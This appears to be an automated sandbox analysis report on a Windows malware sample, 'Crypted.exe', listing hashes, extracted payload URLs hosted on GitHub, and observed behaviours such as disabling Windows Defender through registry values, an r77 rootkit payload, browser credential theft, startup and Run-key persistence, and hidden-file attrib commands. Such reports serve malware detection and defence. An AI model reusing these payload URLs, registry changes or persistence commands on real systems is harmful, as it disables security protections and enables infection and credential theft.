Analysis
-
max time kernel
519s -
max time network
427s -
platform
windows10-2004_x64 -
resource
win10v2004-20240704-en -
resource tags
arch:x64arch:x86image:win10v2004-20240704-enlocale:en-usos:windows10-2004-x64system -
submitted
28-07-2024 19:42
Static task
static1
Behavioral task
behavioral1
Sample
Crypted.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
Crypted.exe
Resource
win10v2004-20240704-en
General
-
Target
Crypted.exe
-
Size
50KB
-
MD5
5dd57385d3af83d5a7160e9c14aa09f5
-
SHA1
64aabb5a9d77cbb8768779c7f3d0231465ea29f0
-
SHA256
1f465a7b1dac4223346ba3070599d95dcdaa071d31d0e0a301322ee4433b4b7a
-
SHA512
05eb789f336fe6d4280b085d86774bdc6e818e822a42a9165102dcbd478d16168dbceadd786783547db37f7635a5451211daea3fd008557a1d3f0533326e9ea5
-
SSDEEP
1536:5GuV08a0ep7+bYrVNXUsyWSBY99w399hVkrf1t0:bYrVOsyWSBY99kq5W
Malware Config
Extracted
https://github.com/NGROKC/CTC/raw/main/SInject2.dll
Extracted
https://github.com/NGROKC/CTC/raw/main/CTC64.dll
Signatures
-
Contains code to disable Windows Defender 2 IoCs
A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.
Processes:
resource yara_rule behavioral2/memory/3264-1-0x00000000002A0000-0x00000000002B2000-memory.dmp disable_win_def C:\ProgramData\caca\$77-caca.exe.exe disable_win_def -
Processes:
$77-caca.exe.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection $77-caca.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" $77-caca.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" $77-caca.exe.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" $77-caca.exe.exe -
r77 rootkit payload 1 IoCs
Detects the payload of the r77 rootkit.
Processes:
resource yara_rule C:\ProgramData\caca\r77-x64.dll r77_payload -
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
-
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exeflow pid process 64 3448 powershell.exe 65 4020 powershell.exe 70 4020 powershell.exe 71 3448 powershell.exe -
Downloads MZ/PE file
-
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
-
Manipulates Digital Signatures 1 TTPs 3 IoCs
Attackers can apply techniques such as changing the registry keys of authenticode & Cryptography to obtain their binary as valid.
Processes:
certutil.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION" certutil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION" certutil.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL" certutil.exe -
Sets file to hidden 1 TTPs 2 IoCs
Modifies file attributes to stop it showing in Explorer etc.
Processes:
attrib.exeattrib.exepid process 2468 attrib.exe 1012 attrib.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Crypted.exe$77-caca.exe.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation Crypted.exe Key value queried \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\Control Panel\International\Geo\Nation $77-caca.exe.exe -
Drops startup file 3 IoCs
Processes:
$77-caca.exe.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sjava.vbs $77-caca.exe.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-caca.exe.exe $77-caca.exe.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\$77-caca.exe.exe $77-caca.exe.exe -
Executes dropped EXE 1 IoCs
Processes:
$77-caca.exe.exepid process 1172 $77-caca.exe.exe -
Loads dropped DLL 26 IoCs
Processes:
msedge.exemsedge.exemsedge.exeCompPkgSrv.exeCompPkgSrv.exevssvc.exemsedge.exechrome.exemsedge.exepid process 5600 5608 5872 msedge.exe 5860 msedge.exe 5140 msedge.exe 2712 CompPkgSrv.exe 5456 CompPkgSrv.exe 4492 3252 vssvc.exe 5200 5684 5680 4328 msedge.exe 5796 chrome.exe 5984 msedge.exe 1516 5276 5380 1508 5740 5820 1376 4564 3036 6088 6060 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
$77-caca.exe.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" $77-caca.exe.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features $77-caca.exe.exe -
Adds Run key to start application 2 TTPs 3 IoCs
Processes:
$77-caca.exe.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77-caca = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-caca.exe.exe" $77-caca.exe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\$77-caca = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\$77-caca.exe.exe" $77-caca.exe.exe Set value (str) \REGISTRY\USER\S-1-5-21-1403246978-718555486-3105247137-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77-caca = "C:\\Users\\Admin\\AppData\\Roaming\\$77-caca.exe.exe" $77-caca.exe.exe -
Processes:
$77-caca.exe.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA $77-caca.exe.exe -
Processes:
powershell.exepowershell.exepowershell.exepid process 4020 powershell.exe 3448 powershell.exe 5584 powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 69 raw.githubusercontent.com 70 raw.githubusercontent.com 71 raw.githubusercontent.com -
Drops autorun.inf file 1 TTPs 4 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
Processes:
$77-caca.exe.exedescription ioc process File created C:\autorun.inf $77-caca.exe.exe File opened for modification C:\autorun.inf $77-caca.exe.exe File created F:\autorun.inf $77-caca.exe.exe File opened for modification F:\autorun.inf $77-caca.exe.exe -
Drops file in Program Files directory 5 IoCs
Processes:
chrome.exechrome.exechrome.exedescription ioc process File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\110.0.5481.104\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\110.0.5481.104\debug.log chrome.exe File opened for modification C:\Program Files\Google\Chrome\Application\debug.log chrome.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 14 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
Crypted.exe$77-caca.exe.execmd.exepowershell.exeattrib.exeexplorer.execmd.execmd.exepowershell.execertutil.exepowershell.execmd.exeattrib.exepowershell.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Crypted.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language $77-caca.exe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language certutil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
dwm.exedescription ioc process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe -
Enumerates system info in registry 2 TTPs 8 IoCs
Processes:
chrome.exemsedge.exedwm.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe -
Modifies data under HKEY_USERS 20 IoCs
Processes:
chrome.exedwm.exedescription ioc process Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133666695561482383" chrome.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople dwm.exe -
Modifies registry class 1 IoCs
Processes:
msedge.exedescription ioc process Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-1403246978-718555486-3105247137-1000\{9C554274-B722-49FE-A49F-F65AADB17E8C} msedge.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exechrome.exepowershell.exepowershell.exemsedge.exemsedge.exemsedge.exeCompPkgSrv.exeCompPkgSrv.exevssvc.exeidentity_helper.exe$77-caca.exe.exepid process 4020 powershell.exe 4020 powershell.exe 4020 powershell.exe 3448 powershell.exe 3448 powershell.exe 3448 powershell.exe 4448 chrome.exe 4448 chrome.exe 5592 powershell.exe 5592 powershell.exe 5584 powershell.exe 5584 powershell.exe 5592 powershell.exe 5872 msedge.exe 5872 msedge.exe 5584 powershell.exe 5860 msedge.exe 5860 msedge.exe 5140 msedge.exe 5140 msedge.exe 5140 msedge.exe 5140 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 2712 CompPkgSrv.exe 5456 CompPkgSrv.exe 3252 vssvc.exe 3252 vssvc.exe 3596 identity_helper.exe 3596 identity_helper.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe 1172 $77-caca.exe.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
$77-caca.exe.exepid process 1172 $77-caca.exe.exe -
Suspicious behavior: LoadsDriver 64 IoCs
Processes:
pid process 6024 4500 5244 5896 5988 4116 4148 4236 3060 4248 4252 4376 4352 2212 2684 780 4880 5476 4512 5416 5408 3592 5472 5436 428 5852 5280 1280 6132 6044 5400 4596 1684 632 3308 1316 2740 4184 1492 524 2336 2192 332 4008 5252 1084 5260 3608 6104 4388 3396 3996 4288 5136 6000 3076 628 5904 5804 5020 376 5836 1340 736 -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 26 IoCs
Processes:
chrome.exemsedge.exepid process 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exechrome.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4020 powershell.exe Token: SeDebugPrivilege 3448 powershell.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeDebugPrivilege 5592 powershell.exe Token: SeDebugPrivilege 5584 powershell.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe Token: SeShutdownPrivilege 4448 chrome.exe Token: SeCreatePagefilePrivilege 4448 chrome.exe -
Suspicious use of FindShellTrayWindow 64 IoCs
Processes:
chrome.exemsedge.exepid process 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe -
Suspicious use of SendNotifyMessage 64 IoCs
Processes:
chrome.exemsedge.exepid process 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 5860 msedge.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe 4448 chrome.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Crypted.execmd.exeexplorer.exe$77-caca.exe.execmd.execmd.exechrome.execmd.exedescription pid process target process PID 3264 wrote to memory of 3296 3264 Crypted.exe cmd.exe PID 3264 wrote to memory of 3296 3264 Crypted.exe cmd.exe PID 3264 wrote to memory of 3296 3264 Crypted.exe cmd.exe PID 3296 wrote to memory of 2468 3296 cmd.exe attrib.exe PID 3296 wrote to memory of 2468 3296 cmd.exe attrib.exe PID 3296 wrote to memory of 2468 3296 cmd.exe attrib.exe PID 3264 wrote to memory of 3936 3264 Crypted.exe explorer.exe PID 3264 wrote to memory of 3936 3264 Crypted.exe explorer.exe PID 3264 wrote to memory of 3936 3264 Crypted.exe explorer.exe PID 3544 wrote to memory of 1172 3544 explorer.exe $77-caca.exe.exe PID 3544 wrote to memory of 1172 3544 explorer.exe $77-caca.exe.exe PID 3544 wrote to memory of 1172 3544 explorer.exe $77-caca.exe.exe PID 1172 wrote to memory of 892 1172 $77-caca.exe.exe cmd.exe PID 1172 wrote to memory of 892 1172 $77-caca.exe.exe cmd.exe PID 1172 wrote to memory of 892 1172 $77-caca.exe.exe cmd.exe PID 892 wrote to memory of 1012 892 cmd.exe attrib.exe PID 892 wrote to memory of 1012 892 cmd.exe attrib.exe PID 892 wrote to memory of 1012 892 cmd.exe attrib.exe PID 1172 wrote to memory of 2064 1172 $77-caca.exe.exe cmd.exe PID 1172 wrote to memory of 2064 1172 $77-caca.exe.exe cmd.exe PID 1172 wrote to memory of 2064 1172 $77-caca.exe.exe cmd.exe PID 2064 wrote to memory of 4020 2064 cmd.exe powershell.exe PID 2064 wrote to memory of 4020 2064 cmd.exe powershell.exe PID 2064 wrote to memory of 4020 2064 cmd.exe powershell.exe PID 1172 wrote to memory of 4856 1172 $77-caca.exe.exe certutil.exe PID 1172 wrote to memory of 4856 1172 $77-caca.exe.exe certutil.exe PID 1172 wrote to memory of 4856 1172 $77-caca.exe.exe certutil.exe PID 4448 wrote to memory of 2460 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 2460 4448 chrome.exe chrome.exe PID 1172 wrote to memory of 4272 1172 $77-caca.exe.exe cmd.exe PID 1172 wrote to memory of 4272 1172 $77-caca.exe.exe cmd.exe PID 1172 wrote to memory of 4272 1172 $77-caca.exe.exe cmd.exe PID 4272 wrote to memory of 3448 4272 cmd.exe powershell.exe PID 4272 wrote to memory of 3448 4272 cmd.exe powershell.exe PID 4272 wrote to memory of 3448 4272 cmd.exe powershell.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe PID 4448 wrote to memory of 3508 4448 chrome.exe chrome.exe -
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 2 IoCs
Processes:
attrib.exeattrib.exepid process 2468 attrib.exe 1012 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Crypted.exe"C:\Users\Admin\AppData\Local\Temp\Crypted.exe"1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3264 -
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\Crypted.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3296 -
C:\Windows\SysWOW64\attrib.exeattrib +s +h +r "C:\Users\Admin\AppData\Local\Temp\Crypted.exe"3⤵
- Sets file to hidden
- System Location Discovery: System Language Discovery
- Views/modifies file attributes
PID:2468
-
-
-
C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe" C:\ProgramData\caca\$77-caca.exe.exe2⤵
- System Location Discovery: System Language Discovery
PID:3936
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
- Suspicious use of WriteProcessMemory
PID:3544 -
C:\ProgramData\caca\$77-caca.exe.exe"C:\ProgramData\caca\$77-caca.exe.exe"2⤵
- Modifies Windows Defender Real-time Protection settings
- Checks computer location settings
- Drops startup file
- Executes dropped EXE
- Windows security modification
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops autorun.inf file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:1172 -
C:\Windows\SysWOW64\cmd.execmd.exe /c attrib +s +h +r "C:\ProgramData\caca\$77-caca.exe.exe"3⤵
- System Location Discovery: System Language Discovery
